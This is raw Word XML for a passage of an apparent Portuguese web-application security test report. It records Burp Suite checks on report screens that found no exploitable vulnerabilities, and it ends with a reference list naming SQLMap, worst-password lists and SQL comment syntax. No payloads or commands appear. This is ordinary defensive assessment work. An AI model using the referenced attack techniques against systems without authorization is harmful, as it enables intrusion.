      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="2100"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">De acordo com o Burp Suite, a página não recebe nenhum parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="2100"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Quando </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregados para filtrar os dados </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="00751591">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00015DE3" w:rsidRDefault="00E77F75" w:rsidP="008C6DC7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2732405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5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Default="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 36- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="2100"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Da mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, a ferramenta indica que a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impressão de Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24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firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B71318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Pr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId47"/>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>NTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>NetBios</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          </w:rPr>
          <w:t>Sintaxe comentários MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          </w:rPr>
          <w:t>Sintaxe comentários SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="00654DEF" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          </w:rPr>
          <w:t>Sintaxe comentários Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2484"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB70B5" w:rsidRPr="008C6DC7" w:rsidRDefault="00DB70B5" w:rsidP="008C6DC7"/>
    <w:sectPr w:rsidR="00DB70B5" w:rsidRPr="008C6DC7" w:rsidSect="00174603"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37476" w:rsidRDefault="00337476" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00337476" w:rsidRDefault="00337476" w:rsidP="009A6B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37476" w:rsidRDefault="00337476" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00337476" w:rsidRDefault="00337476" w:rsidP="009A6B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3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BA4C9F80"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Commarcadore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>
    <w:nsid w:val="FFFFFFFE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9DCAC652"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="00000001"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00000000"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs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0000002"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00000000"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs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>
    <w:nsid w:val="05FA7FD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="873ECA70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1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl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3128" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="06A058F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9612994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80C6132"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D522F06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2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9349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49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912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6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104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8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296" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="0AB60D52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D522F06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2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7261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899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40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824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016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679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208" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2D522F06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9">
    <w:nsid w:val="0E4E76BE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DFE3EEE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10">
    <w:nsid w:val="11C84F32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B9859FC"/>
    <w:lvl w:ilvl="0" w:tplc="0416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6000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2148" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B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>
    <w:nsid w:val="146231EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F76FCC2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
